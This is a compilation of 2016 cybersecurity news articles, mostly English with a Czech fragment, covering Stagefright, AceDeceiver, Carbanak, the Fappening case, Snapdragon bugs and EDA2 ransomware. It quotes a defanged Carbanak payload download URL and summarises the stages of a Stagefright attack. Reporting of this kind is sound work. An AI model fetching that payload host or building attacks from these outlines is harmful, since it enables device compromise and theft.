V medicíně bychom našli mnoho dalších pokusů tohoto typu jakéhosi neinvazivního, „umírněného grindingu“. Kontaktní čočka pro diabetiky nevzbuzuje žádné negativní emoce, kromě pochybností o tom, zda informace o hladině cukru v krvi má být prostřednictvím barvy čočky dostupná také všem lidem v okolí. Již spornějším případem jsou například snahy o integraci čipů do tablet s lékem.
Kyberzločinci kradli bitcoiny pomocí rozšíření v prohlížeči
17.3.2016 Hacking
Kurz bitcoinů se drží posledních pár týdnů poměrně vysoko. To je jeden z hlavních důvodů, proč tato virtuální měna láká stále více lidí po celém světě. Vysoká popularita nezůstala lhostejná ani kyberzločincům, kteří se právě na majitele bitcoinů zaměřili. Šance na jejich dopadení je prakticky nulová.
Počítačoví piráti se zaměřili na uživatele internetové stránky BitcoinWisdom.com, kterou každý měsíc navštíví milióny uživatelů z různých koutů světa. Tento server totiž nabízí v poměrně přehledné formě informace o kurzu bitcoinu a analýzy možných vývojů kurzů. Pro uživatele je tedy jakousi nápovědou, jak nakupovat nebo prodávat.
Uživatelům zmiňovaného serveru nabídli kyberzločinci rozšíření pro populární internetový prohlížeč Chrome, které dovolovalo na stránkách BitcoinWisdom.com blokovat reklamu.
Přesně to rozšíření také v praxi dělalo, takže si uživatelé prvních pár dnů používání patrně ani nevšimli, že je něco v nepořádku. Kromě blokování reklamy totiž toto rozšíření přesměrovávalo platby v bitcoinech, uvedl server Softpedia.
Poslané peníze končily na účtech pirátů
Poslané peníze tak končily na účtech podvodníků. Vzhledem k tomu, že transakce bitcoinů není prakticky možné vystopovat, je velmi nepravděpodobné, že by se podařilo kyberzločince vystopovat.
Je každopádně jasné, že byznys to byl pro počítačové piráty opravdu velký. Pouhý jeden bitcoin má při aktuálním kurzu hodnotu zhruba 10 000 korun. Slušný balík peněz tak mohli vydělat i v případě, že by se jim podařilo získat pouhých pár bitcoinů.
Kolik uživatelů se podařilo prostřednictvím rozšíření kyberzločincům okrást, zatím není známo.
Virtuální měny představují velké riziko
Virtuální měna bitcoin vznikla v roce 2009, větší popularitě se ale těší v posledních letech. Vytvořena byla tak, aby se nedala ovlivňovat žádnou vládou ani centrální bankou.
Kybernetické mince "razí" síť počítačů se specializovaným softwarem, naprogramovaným tak, aby uvolňoval nové mince stabilním, ale stále klesajícím tempem. Počet mincí v oběhu má dosáhnout nakonec 21 miliónů, což má být kolem roku 2140.
Bitcoiny se těší velké popularitě především coby prostředek pro investici. Kurzy však často kolísají. Evropský bankovní úřad kvůli tomu dokonce již dříve varoval spotřebitele, že neregulované virtuální měny představují velké riziko. Jejich vklady totiž nejsou nijak chráněny.
DARPA Invites Geeks to Convert Everyday Objects into Deadly Weapons
17.3.2016 IT
Do you know that your daily household items can be turned into deadly weapons?
Yes, it's possible to convert some of your everyday household appliances into explosives, weapons or surveillance devices.
DARPA – the agency which does research in various fields for improving the US Military and US Department of Defense capabilities – had announced a new project dubbed "Improv" to transform simple household appliances into deadly weapons i.e. homemade weapons.
In previous years, various military grade weapons had been found malfunctioned by the ordinary household things that could cripple the military inventions.
By various incidents happening around the Military grounds, officials observed that "how easily-accessed hardware, software, processes, and methods could be used to create products or systems that could pose a future threat."
So, DARPA (Defense Advanced Research Projects Agency) proceeded with a program and is seeking proposals from engineers, skilled hardware hackers, biologists and information technologists, who can come up with some innovative ideas to build a deadly system or devices by unleashing the power of everyday things.
Improv - Initiative to Build Weaponised Capabilities into Home Appliances
Improv program will carry out research on the systems and devices of the readily available technology that could threaten the national security by challenging the current military equipment.
"Improv will explore ways to combine or convert commercially available products such as off-the-shelf electronics, components created through rapid prototyping, and open-source code to cost-effectively create sophisticated military technologies and capabilities," said John Main, Improv's Program Manager.
The program's prime aim is to build capabilities of a weaponized device in normal household things.
Open Challenge!
Improv would undergo 3 Phases to finalize the proposed system:
Phase 1: Submit plans for off-the-shelf prototype and if selected, candidates would be rewarded with $40,000.
Phase 2: The second round of the program requires selected candidates to bring proposed prototype model into real world system for which DARPA will fund $70,000.
Phase 3: The final stage is for a live demonstration with up to $20,000 for testing.
The Candidates have to complete this task with a strict deadline of 90 days as per Rules of DARPA.
Improv understands the fact that no one can be a Jack of all trades. Hence, there are no exclusions for anyone to give his or her try, which could really save the world from the potential dangers, unlike "Hack the Pentagon" program which was opened only for US Nationals.
Nowadays many mushrooming methods are evolved to manipulate the legit systems, which is a nightmare for millions and a daydream for criminals.
So, Improv would be seen as a new dimension to the US Military Defense to tackle the risky attacks.
ProtonMail is open. Do you want an encrypted email account? Sign in!
17.3.2016 Security
ProtonMail, the world’s largest privacy-focused and encrypted email provider, announced today that the service is leaving beta.
ProtonMail, the world’s largest privacy-focused and encrypted email provider, announced today that the service is leaving beta and will be allowing open registrations for the first time in nearly two years. For the past couple of years, ProtonMail has been invite-only, more that one million users had the opportunity to test the beta. The service also presented its free mobile apps available for both Apple iOS and Android devices.
ProtonMail was first launched in beta in May 2014 by a group of scientists who met at CERN and MIT, but its popularity reached the peak after the disclosure of the Snowden‘s revelation on the mass-surveillance operated by the FiveEyes alliance.
The company then received an impressive amount of demands for new accounts that forced it to create a waiting list. According to the company, the requests exceeded 10,000 per day.
ProtonMail is an essential instrument to protect our privacy, businesses, journalists, activists, security experts, private individuals, me … and Mr Robot, already use it. The email service implements the end-to-end encryption allowing users to communicate securely on the Internet making impossible for law enforcement and intelligence agencies to eavesdrop the traffic.
In the End-to-end Encryption model data is encrypted on the sender’s system before passing it to the servers of the service provider, which turn the encrypted data to the intended recipient, who is the only entity who can decrypt it.
Of course, this isn’t a good moment for companies that offers such kind of services, ProtonMail has been frequently thrust into the public debate over encryption and terrorism, and in several cases it had problems with governments to protect user privacy.
“Strong encryption and privacy are a social and economic necessity, not only does this technology protect activists and dissidents, it is also key to securing the world’s digital infrastructure,” says ProtonMail Co-Founder Dr. Andy Yen, “this is why all things considered, strong encryption is absolutely necessary for the greater good.”
ProtonMail has decided to open the service for public registration, this means that everyone can obtain an account for free immediately.
“The best way to ensure that encryption and privacy rights are not encroached upon is to get the tools into the hands of the public as soon as possible and widely distributing them,” says Yen, “This way, we put the choice in the hands of the consumer, and not government regulators.”
“The past decade has been marked by a massive erosion of privacy and we’re working to reverse this trend,” says Yen. “Encrypted communications is the future and ProtonMail is committed to making online privacy a reality again for all Internet users.”
Get your free account!
New Exploit to 'Hack Android Phones Remotely' threatens Millions of Devices
17.3.2016 Android
Millions of Android devices are vulnerable to hackers and intelligence agencies once again – Thanks to a newly disclosed Android Stagefright Exploit.
Yes, Android Stagefright vulnerability is Back…
…and this time, the Stagefright exploit allows an attacker to hack Android smartphones in 10 seconds just by tricking users into visiting a hacker's web page that contains a malicious multimedia file.
A group of security researchers from Israel-based research firm NorthBit claimed it had successfully exploited the Stagefright bug that was emerged in Android last year and described as the "worst ever discovered".
The new Stagefright exploit, dubbed Metaphor, is detailed in a research paper [PDF] that guides bad guy, good guy as well as government spying agencies to build the Stagefright exploit for themselves.
Just yesterday, we reported about critical vulnerabilities in Qualcomm Snapdragon chip that could be exploited by any malicious application to gain root access on a vulnerable Android device, leaving more than a Billion Android devices at risk.
Video Demonstration — Exploit to Hack Android Phone in 10 Seconds
The researchers have also provided a proof-of-concept video demonstration that shows how they successfully hacked an Android Nexus 5 device using their Metaphor exploit in just 10 seconds. They also successfully tested Metaphor on a Samsung Galaxy S5, LG G3 and HTC One smartphones.
According to the researchers, Millions of unpatched Android devices are vulnerable to their exploit that successfully bypasses security defenses offered by Android operating system.
What is StageFright Bug and Why You have to Worry about it?
Stagefright is a multimedia playback library, written in C++, built inside the Android operating system to process, record and play multimedia files such as videos.
However, what Zimperium researchers discovered last year was that this core Android component can be remotely exploited to hijack 95 percent of Android devices with just a simple booby-trapped message or web page.
Another critical vulnerability discovered last October in Stagefright exploited flaws in MP3 and MP4 files, which when opened were capable of remotely executing malicious code on Android devices, and was dubbed Stagefright 2.0.
However, to tackle this serious issue, Google released a security update that patches the critical bug as well as promised regular security updates for Android smartphones following the seriousness of the Stagefright bugs.
Here's How the New Stagefright Exploit Works
Researchers described the following process to successfully hijack any vulnerable Android smartphone or tablet:
Step 1: Tricking a victim into visiting a malicious web page containing a video file that crashes the Android's mediaserver software to reset its internal state.
Step 2: Once the mediaserver gets a restart, JavaScript on the web page sends information about the victim's device over the Internet to the attacker's server.
Step 3: The attacker's server then sends a custom generated video file to the affected device, exploiting the Stagefright bug to reveal more info about the device's internal state.
Step 4: This information is also sent back to the attacker's server to craft another video file that embeds a payload of malware in it, which when processed by Stagefright starts executing on the victim's smartphone with all the privileges it needs to spy on its owner.
The researchers also claim that their exploit specifically attacks the CVE-2015-3864 vulnerability in a way that bypasses Address Space Layout Randomisation (ASLR), a memory protection process.
"It was claimed [the Stagefright bug] was impractical to exploit in the wild, mainly due to the implementation of exploit mitigations in [latest] Android versions, specifically ASLR," the research paper reads.
The team's exploit works on Android versions 2.2 to 4.0 and 5.0 to 5.1 while bypassing ASLR on Android versions 5.0 to 5.1, as version 2.2 to version 4.0 do not implement ASLR. Other Android versions are not affected by the new Stagefright exploit.
You can go through the full research paper [PDF] that provides enough details to create a fully working and successful exploit.
Warning — Hackers can Silently Install Malware to Non-Jailbroken iOS Devices
17.3.2016 iOS
Hard time for mobile phone users!
Just recently, two severe vulnerabilities in Qualcomm Snapdragon chip and Stagefright were spotted on the Android platform, affecting more than a Billion and Millions of devices respectively.
And now:
Hackers have discovered a new way to install malicious apps onto your iPhone without your interaction.
Researchers at Palo Alto Networks have uncovered a new strain of malware that can infect Non-Jailbroken (factory-configured) iPhones and iPads without the owner's knowledge or interaction, leaving hundreds of millions of Apple iOS devices at risk.
Dubbed AceDeceiver, the iPhone malware installs itself on iOS devices without enterprise certificates and exploits designing flaws in Apple's digital rights management (DRM) protection mechanism called FairPlay.
What's more concerning about this malware:
Unlike most iOS malware, AceDeceiver works on factory-configured (non-jailbroken) iOS devices as well.
FairPlay is an Apple's software program that prevents people from stealing purchased apps from its official App Store.
apple-iphone-hack
However, with the help of AceDeceiver's "FairPlay Man-in-the-Middle (MITM) technique," hackers can install malicious apps on your iPhone even without your knowledge, simultaneously bypassing Apple's other security defenses.
According to researchers, the FairPlay Man-In-The-Middle (MITM) technique has been in use since 2013, as a way to distribute pirated iOS apps.
"In the FairPlay MITM attack, attackers purchase an app from App Store then intercept and save the authorization code," Claud Xiao from Palo Alto Networks explains in a blog post. "They then developed PC software that simulates the iTunes client behaviors, and tricks iOS devices to believe the app was purchased by the victim."
However, this is the first time the FairPlay technique has been used to spread malware on iOS devices, as the creator of the pirated software can install potentially malicious apps without your knowledge.
Currently, the malicious behaviors related to AceDeceiver has been spotted in China, but researchers warn that the malware could be easily configured to target iPhone users of other geographic regions as well.
For more details, you can head on to Palo Alto Networks' blog post about the AceDeceiver threat.
American Express issued a notice of data breach
17.3.2016 Security
American Express is informing cardholders that their payment card data may have been exposed after a third-party service provider suffered a security breach.
Another illustrious victim of a data breach is in the headlines, this time, American Express is warning Cardholders of a possible incident occurred to a third party service provider. The name of the affected service provider has not been made public.
According to the American Express, data associated with current or previously issued American Express cards might have been stolen by hackers. The information obtained by unauthorized parties includes account numbers, names, and expiration dates.
“We became aware that a third party service provider engaged by numerous merchants experienced unauthorized access to its system. Account information of some of our Card Members, including some of your account information, may have been involved. It is important to note that American Express owned or controlled systems were not compromised by this incident, and we are providing this notice to you as a precautionary measure.” states a data breach notice published by the Office of the Attorney General of the State of California DoJ.
American Express highlighted that its financial systems were not affected by the incident, in order to prevent abuse the company is monitoring of fraudulent activities that might affect cardholders.
American Express Co. credit cards are arranged for a photograph in New York, U.S., on Monday, April 15, 2013. American Express Co., the biggest U.S. credit-card issuer by purchases, named Edward P. Gilligan to become its president, effective immediately. Photographer: Scott Eells/Bloomberg via Getty Images
American Express confirmed that cardholders are not liable for any fraudulent charges, at the same time is inviting them to monitor their account for fraud.
American Express suggests cardholders enabling instant notifications of a potentially fraudulent activity, the company offers it by enabling notifications in the American Express Mobile app, or signing up for email or text messaging at americanexpress.com/accountalerts
“WHAT YOU CAN DO. We ask that you carefully review your account for fraudulent activity. Below are some steps you can take to protect your account. Login to your account at americanexpress.com/MYCA to review your account statements carefully and remain vigilant in doing so, especially over the next 12 to 24 months. If your card is active, sign up to receive instant notifications of potential suspicious activity by enabling Notifications in the American Express Mobile app, or signing up for email or text messaging at americanexpress.com/accountalerts. Please make sure your mobile phone number and email address are also on file for us to contact you if needed. OTHER IMPORTANT INFORMATION. Included with this letter are some additional helpful tips and steps you can take to protect yourself against the risks of fraud and identity theft.” states the notice.
Incidents like this remark the importance of cyber security for the entire chain of custody with sensitive data, an incident at some point in the chain could compromise the entire process.
In this specific case, American Express relies on a third party service that has been breached causing the exposure of the confidential information.
If you are an AMEX cardholder remain vigilant.
How to install the AceDeceiver malware onto any iOS Device
17.3.2016 iOS
AceDeceiver is the first iOS malware that abuses certain design flaws in Apple’s FairPlay DRM to install malicious apps on iOS devices even non-jailbroken.
Hackers are exploiting a flaw affecting the Apple digital rights management technology (DRM) to install malicious apps on every iOS device, even non-jailbroken ones.
Last month, security experts at Palo Alto Networks firm spotted three malicious applications deployed on the official App Store that were developed to steal Apple IDs and passwords from Chinese users.
The interesting part of the discovery made by Palo Alto is related to the ability of the three apps to be silently installed through software running on Windows machines.
The only ways to install a mobile app on an iOS device that hasn’t been jailbroken, is to download it from the official App Store or install it through the iTunes software from users’ PCs. In this second scenario, the device verifies the legitimate origin of the app with the Apple’s FairPlay DRM technology.
In 2014, a team of researchers from Georgia Institute of Technology presented at the USENIX conference, a method through which an iOS device could be tricked to install any app, previously acquired by a different Apple ID, through the iTunes.
At this point the attack scenario is clear, hackers can remotely install apps on iOS device connected to an already compromised PC.
Without this premise, now researchers at Palo Alto Networks confirmed that hackers in the wild are still using this trick to serve a malicious app named AceDeceiver on non-jailbroken devices.
“We’ve discovered a new family of iOS malware that successfully infected non-jailbroken devices we’ve named “AceDeceiver”. states a blog post published by Palo Alto Networks.
“What makes AceDeceiver different from previous iOS malware is that instead of abusing enterprise certificates as some iOS malware has over the past two years, AceDeceiver manages to install itself without any enterprise certificate at all. It does so by exploiting design flaws in Apple’s DRM mechanism, and even as Apple has removed AceDeceiver from App Store, it may still spread thanks to a novel attack vector.”
The threat actors first uploaded their apps to the App Store, managing to pass Apple’s review process by submitting them as wallpapers. Once the apps are deployed on the official store they purchased the apps through the iTunes in order to capture the DRM FairPlay authorization code.
The crooks developed a client software that simulates the iTunes and distributed it in China masquerading it as a helper program for iOS devices that can perform system reinstallation, jailbreaking, system backup, device management, and system cleaning.
“To carry out the attack, the author created a Windows client called ”爱思助手 (Aisi Helper)” to perform the FairPlay MITM attack. Aisi Helper purports to be software that provides services for iOS devices such as system re-installation, jailbreaking, system backup, device management and system cleaning.” continues the post.
When users connected their iOS devices to a computer running this software, it silently installed AceDeceiver by using the authorization code captured when the app was first deployed on the official store.
“By deploying authorized computer in the C2 server, and using a client software as agent in the middle, the attacker can distribute that purchased iOS app to unlimited iOS devices.” reads the post.
What happen if Apple removes the AceDeceiver apps from the official store?
Nothing, the technique presented by the researchers at USENIX in 2014 works even if the app has been removed from the App Store because attackers already have the authorization code they need to complete the installation.
“Even if an app has been removed from the App Store, attackers can still distribute their own copies to iOS users.” the team of experts explained at the USENIX conference.
The technique used to serve the AceDeceiver malware is very dangerous, in the future other criminal gangs could start using it.
“Our analysis of AceDeceiver leads us to believe FairPlay MITM attack will become another popular attack vector for non-jailbroken iOS devices – and thus a threat to Apple device users worldwide. Palo Alto Networks has released IPS signatures (38914, 38915) and has updated URL filtering and Threat Prevention to protect customers from the AceDeceiver Trojan as well as the FairPlay MITM attack technique.” states the Palo Alto.
Apple users beware, no one is immune!
Man behind The Fappening case charged with hacking celebrity accounts
17.3.2016 Hacking
Pennsylvania man behind the Fappening case Charged with hacking Apple and Google e-Mail accounts belonging to more than 100 people.
The culprit of the popular Fappening case may have a name, the US Department of Justice (DOJ) announced on Tuesday that it charged Ryan Collins, 36, of Pennsylvania for hacking Apple and Google E-Mail accounts belonging to more than 100 people, mostly celebrities.
In September 2014, the FBI started an investigation after iCloud accounts of celebrities were hacked by unknowns that have stolen their pictures.
Immediately Apple denied that its iCloud platform was breached, instead, it explained that hackers obtained the images by hacking victims. A few days later, the consumer tech giant also announced that it would
A few days later, Apple announced the implementation of new features to improve the security of the iCloud service.
The list of victims is long and includes Jennifer Lawrence and Kim Kardashian, the hacker has stolen the private images of the celebrities and leaked their nude photos onto 4chan.
“A Pennsylvania man was charged today with felony computer hacking related to a phishing scheme that gave him illegal access to over 100 Apple and Google e-mail accounts, including those belonging to members of the entertainment industry in Los Angeles.” states the press release issued by the DoJ.
Collins admitted his responsibility and signed a plea agreement to plead guilty to a felony violation of the Computer Fraud and Abuse Act.
The man carried out spear phishing emails to the victims from November 2012 until the beginning of September 2014. In this way the man obtained the login credentials from its victims, then he illegally accessed their e-mail accounts to access sensitive and personal information.
The man behind the Fappening case focused his efforts to access nude pictures and videos from the victims, the DoJ announcement also revealed that in some circumstance he used a software to download the entire contents of the victims’ Apple iCloud backups.
“After illegally accessing the e-mail accounts, Collins obtained personal information including nude photographs and videos, according to his plea agreement. In some instances, Collins would use a software program to download the entire contents of the victims’ Apple iCloud backups.” continues the press release.
The case will be transferred from Los Angeles to Harrisburg in the Middle District of Pennsylvania, where Collins lives.
Collins will face a statutory maximum sentence of five years in federal prison, but the man reached an agreement for a recommendation of a prison term of 18 months.
“By illegally accessing intimate details of his victims’ personal lives, Mr. Collins violated their privacy and left many to contend with lasting emotional distress, embarrassment and feelings of insecurity. We continue to see both celebrities and victims from all walks of life suffer the consequences of this crime and strongly encourage users of Internet-connected devices to strengthen passwords and to be skeptical when replying to emails asking for personal information,” David Bowdich, the Assistant Director in Charge of the FBI’s Los Angeles Field Office, said.
Other hackers have been already charged for hacking celebrities’ email accounts, in December 2015, Alonzo Knowles, aka “Jeff Moxey,” has been charged after allegedly hacking into the email accounts belonging to 130 celebrities stealing personal information, movie scripts and sex tapes.
Carbanak Group targets entities in Middle East and US with new TTPs
17.3.2016 Virus
Proofpoint has collected evidence of new Carbanak group campaigns.The hackers are targeting banks in the Middle East, the United States and other countries.
Security researchers at Proofpoint firm sustain to have collected evidence of new Carbanak group campaigns. This time the hackers are targeting banks in the Middle East, the United States and other countries.
Last year, Kaspersky investigated a number of cyber attacks on 29 Russian organizations, the researchers believe that these attacks have been coordinated by Carbanak and two other criminal gangs dubbed “Metel” and “GCMAN,” that adopted similar hacking techniques.
In September 2015, security experts at CSIS discovered that the Carbanak malware was still being used in spear phishing attacks against major organizations in UE and Europe.
“Just recently, CSIS carried out a forensic analysis involving a Microsoft Windows client that was compromised in an attempt to conduct fraudulent online banking transactions. As part of the forensic task, we managed to isolate a signed binary, which we later identified as a new Carbanak sample. ” wrote the CSIS in a blog post published by the CSIS.
“We speculate that the main purpose of this company is to receive money from fraudulent transactions. As stated in the Kaspersky report, Carbanak-related transfers are rather huge. Possibly, they have registered a company and opened bank accounts in order to receive their stolen money while having full control of the transferring process,”
The new Carbanak trojan was relying on predefined IP addresses instead of domains and in order to improve the evasion capability its code was signed with a digital certificate issued by Comodo to a Russia-based wholesale company.
Kaspersky confirmed that the Carbanak gang (also called Carbanak 2.0 by Kaspersky) was behind the attacks spotted by CSIS and revealed that the group is now targeting also the budgeting and accounting departments of various types of organizations, a including financial institution, and a telecoms company.
The group that targeted a Russian bank used a strain of malware known as Metel (aka Corkow) to compromise banks’ networks via spear-phishing emails.
This week, researchers at Proofpoint revealed to have spotted new campaigns targeting Middle Eastern countries, including United Arab Emirates, Kuwait, Lebanon and Yemen. The new campaign it targeting high-level executives and , directors, and operations managers at banks and enterprise software firms
The Carbanak Group seems to be targeting high-level executives, directors, senior managers, and regional and operations managers at banks, financial organizations, companies selling enterprise software, and professional services companies.
The hackers launched spear phishing attacks against victims, the email messages contain a URL that points to a malicious document designed to trigger an old Office vulnerability (CVE-2015-2545) to serve a malware downloader used to drop the Carbanak payload, aka Spy.Sekur.
In other cases, the attackers of the Carbanak Group have sent malicious emails containing links to the Java-based remote access Trojan jRAT.
” Recently, we detected Carbanak campaigns attempting to:
Target high level executives in financial companies or in financial/decision-making roles in the Middle East, U.S. and Europe
Spear-phishing emails delivering URLs, macro documents, exploit documents
Use of Spy.Sekur (Carbanak malware) and commodity remote access Trojans (RATs) such as jRAT, Netwire, Cybergate and others used in support of operations.” states the report published by Proofpoint.
Experts also analyzed another campaign targeting employees of US- and Europe-based companies in the financial industry, mass media, and other seemingly unrelated targets in fire, safety, air conditioning and heating. .
“Unlike the March 1st campaign, which contained links to exploit documents, this campaign employed documents attached to email messages. The two observed documents “remitter request_2016-03-05-122839.doc” and “Reverse debit posted in Error 040316.doc” use macros to download the final Spy.Sekur payload from hxxp://154.16.138[.]74/sexit.exe”
In this second campaign, hackers leveraged on emails containing Word documents which embedded malicious macros.
“Unlike the March 1st campaign, which contained links to exploit documents, this campaign employed documents attached to email messages. The two observed documents “remitter request_2016-03-05-122839.doc” and “Reverse debit posted in Error 040316.doc” use macros to download the final Spy.Sekur payload from hxxp://154.16.138[.]74/sexit.exe” states the report.
The analysis of the information gathered during the investigation allowed the experts to discover most attacks targeted organizations in the United States (17.7 percent), followed by Oman, Australia, UAE, Kuwait, Pakistan, the Netherlands and Germany.
The researchers have uncovered links between Carbanak activity and other threats such as Cybergate, DarkComet and the MorphineRAT.
This last wave of attacks is very interesting because the group used new exploits, macro documents, and RATs to compromise non-Russian targets. The group is also expanding the scope of the attacks targeting companies and organizations in a various industries.
'The Fappening' Hacker Reveals How He Stole Nude Pics of Over 100 Celebrities
16.3.2016 Hacking
Almost one and a half years ago after the massive leakage of celebrities' nude photographs — famous as "The Fappening" or "Celebgate" scandal — a man had been charged with the Computer Fraud and Abuse Act, facing up to 5 years in prison as a result.
The US Department of Justice (DOJ) announced on Tuesday that it charged Ryan Collins, 36, of Pennsylvania for illegally accessing the Gmail and iCloud accounts of various celebrities, including Jennifer Lawrence and Kim Kardashian, and leaked their nude photos onto 4chan.
Social Engineering Helped Hacker Stole Celebs' Nude Pics
Collins was trapped by the Federal Bureau of Investigation (FBI) and in the process of the trial, the hacker revealed that…
The Fappening did not involve Apple's iCloud services being compromised through password cracking or brute-forcing, but rather it was the result of simple Social Engineering, in the form of Phishing Attacks.
Yes, The Fappening scandal was the result of Social Engineering tricks, while we believed that Apple's iCloud services had targeted under brute-force password hacking attacks.
At the time when the celebrities' nude images were circulating online, Apple denied that its iCloud service was hacked and claimed that the hacks were more likely to be a phishing scam. So this was actually the case.
Collins was engaged in Phishing schemes between November 2012 and September 2014, when he hijacked more than 100 celebs' accounts using fake emails disguised as official notifications from Google and Apple, asking victims for their usernames and passwords.
Hacker Used iBrute to Download iCloud Backups
Once done, Collins then used this information to access 50 iCloud accounts and 72 Gmail accounts, most of which belonged to female celebs, and in most cases used specialized 'brute force' software program iBrute to illegally download the contents of their iCloud backups and look for more data, including nude photos of celebrities.
Collins admitted only to hacking celebrities accounts, but not to uploading their naked photos online.
However this does not mean Collins did not leak those photographs, but the hacker negotiated a lighter guilty plea, allowing United States authorities to close the investigation faster.
Collins has not been sentenced yet but faces a maximum sentence of 5 years in prison for his crime, along with fines of up to $250,000. However, according to a plea agreement, the prosecution will recommend the judge an 18-month prison sentence.
Russia Rejects Google's Appeal and Orders to Stop Pre-Installing its own Android Apps
16.3.2016 Android
The Giant search engine Google has lost an anti-monopoly appeal in Russia against ruling related to its Android mobile OS
The Moscow Arbitration Court on Monday ruled that Google had violated its dominant position with the help of its free open source mobile platform "Android" by forcing its own apps and services like Youtube, Google Map, and others, on users — reducing competition.
The complaint was brought against Google last February by competing search engine Yandex — Russian Counterpart of Google — which had argued that Google broke competition rules by requiring handset manufacturers to pre-install its apps on Android phones and tablets.
Yandex-1, Google-0
According to the survey conducted by Liveinternet data in September 2013, Yandex accounted 57.4% of the Russian search market, while Google shared 34.9%. This stats reflected in the share market, as their shares were 62.2 and 26 percent respectively.
These statistical analyzes really worried Google about its operations in the Russian Cyberspace and soon it rolled out its Plan B to gain widespread popularity in the Russian Markets by shipping Android smartphones with Google Play Store as bloatware.
This, however, gained a pony monopoly among the Russian Markets. But soon, Yandex noticed that millions of smartphones in Russia shipped with the Android platform that uses Google as the default search engine.
As Yandex ranked as the 4th largest search engine worldwide, the popularity of Android in Russia had already reflected the changes in the Russian Stock Market, forcing Yandex to proceed with a lawsuit against Google in February 2015.
No Pre-installed Google Apps for Russians
The original ruling was then handed down by the country's privacy watchdog, the Federal Antimonopoly Service (FAS), last September over the pre-installed Google apps on Android and blocking other service providers.
Google appealed the ruling and filed an antitrust to adhere their business in the Russian Markets last year.
However, yesterday (Tuesday) the Moscow Arbitration Court rejected the company's appeal — upholding FAS' judgment that Google's practices broke Russian law by leading to the 'prohibition of pre-installation of apps of other producers.'
To regain its dominance over foreign search engines, FAS had already passed the case in favor of Yandex, the native search engine.
FAS adjourned that the default Android would not be coming with any pre-installed Google apps on Android smartphones and tablets in Russia.
Google will now be required to amend its contract with OEMs in Russia to comply with the ruling. The company now faces having to instruct its contracts with manufacturers and paying a penalty based on its local earnings.
Is Yandex - An Unsung Hero?
There is already a buzz in the cyber chat rooms that Yandex was a cloned product of Google, which is evident from many social discussion sites.
Yandex had already developed a unique method to search the whole Bible and Russian Literatures at its infancy stage, which was adopted by Google later.
These are some of the hidden facts about Yandex:
Yandex launched as a search engine in 1997, a year earlier than Google.
Yandex also launched maps in 2004, Google a year later in 2005.
Yandex was the first to launch news search in 2000, Google in 2002.
Blog search came out of Russia in 2004, but out of California only in 2006.
Yandex had already launched an RSS aggregator in 2005, Google followed in 2006.
Even Though Google had implemented many new ideas as time progressed with the help of its think tanks, yet Yandex was behind the implementations of classic times.
Let's look what would be the next roll out from Yandex after the Thumbs Up Rule from FAS.
More than a Billion Snapdragon-based Android Phones Vulnerable to Hacking
16.3.2016 Android
More than a Billion of Android devices are at risk of a severe vulnerability in Qualcomm Snapdragon chip that could be exploited by any malicious application to gain root access on the device.
Security experts at Trend Micro are warning Android users of some severe programming blunders in Qualcomm's kernel-level Snapdragon code that if exploited, can be used by attackers for gaining root access and taking full control of your device.
Gaining root access on a device is a matter of concern, as it grants attackers access to admin level capabilities, allowing them to turn your device against you to snap your pictures, and snoop on your personal data including accounts’ passwords, emails, messages and photos.
The company’s own website notes that Qualcomm Snapdragon SoCs (systems on a chip) power more than a Billion smart devices, including many Internet of Things (IoTs) as of today. Thus, the issue puts many people at risk of being attacked.
Although Google has pushed out updates after Trend Micro privately reported the issues that now prevents attackers from gaining root access with a specially crafted app, users will not be getting updates anytime soon.
The security update rolls out to your device through a long chain:
Qualcomm → Google → Your device's manufacturer → Your network carrier → Your handheld over the air
"Given that many of these devices are either no longer being patched or never received any patches in the first place," said Trend engineer Wish Wu, "they would essentially be left in an insecure state without any patch forthcoming."
Unfortunately, what’s more concerning is the fact that the same vulnerable chips are used in a large number of IoT devices, which are no longer in line for security updates. This makes it possible for hackers to gain root access to these connected devices, which is more worrying.
"Smartphones aren't the only problem here," said Trend's Noah Gamer. "Qualcomm also sells their SoCs to vendors producing devices considered part of the Internet of Things, meaning these gadgets are just as at risk."
"If IoT is going to be as widespread as many experts predict, there needs to be some sort of system in place ensuring these devices are safe for public use. Security updates are an absolute necessity these days, and users of these connected devices need to know what they're dealing with."
Whatever be the reason: if security patches are not available for your device model or take too long to arrive, in both the cases it gives miscreants time to exploit the security holes to gain control of your device.
However, some users are lucky to choose Google’s handsets that get their patches direct from the tech giant automatically, making them safe from the vulnerabilities. The handsets include Nexus 5X, Nexus 6P, Nexus 6, Nexus 5, Nexus 4, Nexus 7, Nexus 9, and Nexus 10.
All of the smart devices using the Qualcomm Snapdragon 800 series, including the 800, 805 and 810 and running a 3.10-version kernel are affected by the vulnerabilities.
The vulnerable code is present in Android version 4 to version 6. In the tests, researchers found Nexus 5, 6 and 6P, and Samsung Galaxy Note Edge using vulnerable versions of Qualy's code.
Though the researchers do not have access to every Android handset and tablet to test, the list of vulnerable devices is non-exhaustive.
Since the researchers have not disclosed full details about the flaws, the short brief about the vulnerabilities is as follows:
1. Qualcomm-related flaw (CVE-2016-0819): The vulnerability has been described by the researchers as a logic bug that allows a small section of kernel memory to be tampered with after it is freed, causing an information leakage and a Use After Free issue in Android.
2. The flaw (CVE-2016-0805) is in Qualcomm chipset kernel function get_krait_evtinfo: The get_krait_evtinfo function returns an index into an array used by other kernel functions. With the help of carefully crafted input data, it is possible to generate a malicious index, leading to a buffer overflow.
3. Gaining root access: Using both the flaws together on vulnerable devices, attackers can gain root access on the device.
The researchers will disclose the full details of exactly how to leverage the bugs at the upcoming Hack In The Box security conference in the Netherlands to be held in late May 2016.
EDA2, derived from the educational ransomware, is easy to break
16.3.2016 Virus
The new strain of educational ransomware EDA2 is infecting systems in the wild, but experts discovered that it is quite easy to neutralize.
Do you remember the EDA2 ransomware?
It is one of the educational ransomware developed by the security expert Utku Sen, now a new variant of the EDA2 educational ransomware appeared in the wild and the good news is that this variant is quite easy to neutralize.
The EDA2 ransomware encrypts victims’ files using AES encryption, then it appends the .locked extension to them. In a way similar to other ransomware, EDA2 also drops notes on the infected machines and informs users that they need to pay .5 bitcoins to restore their files.
According to the experts at Bleeping Computer, the educational ransomware has already infected more than 650 machines and the analysis of the Bitcoin address associated with the ransom request revealed that only 3 victims have paid.
The crooks are targeting online gamers, the EDA2 educational ransomware spread via a link associated with a YouTube video that explains how to crack the Far Cry Primal videogame. When victims try to execute the file crack are infected by the ransomware that encrypts users’ files.
The new strain of educational ransomware EDA2 is infecting systems in the wild, but experts discovered that it is quite easy to neutralize.
Do you remember the EDA2 ransomware?
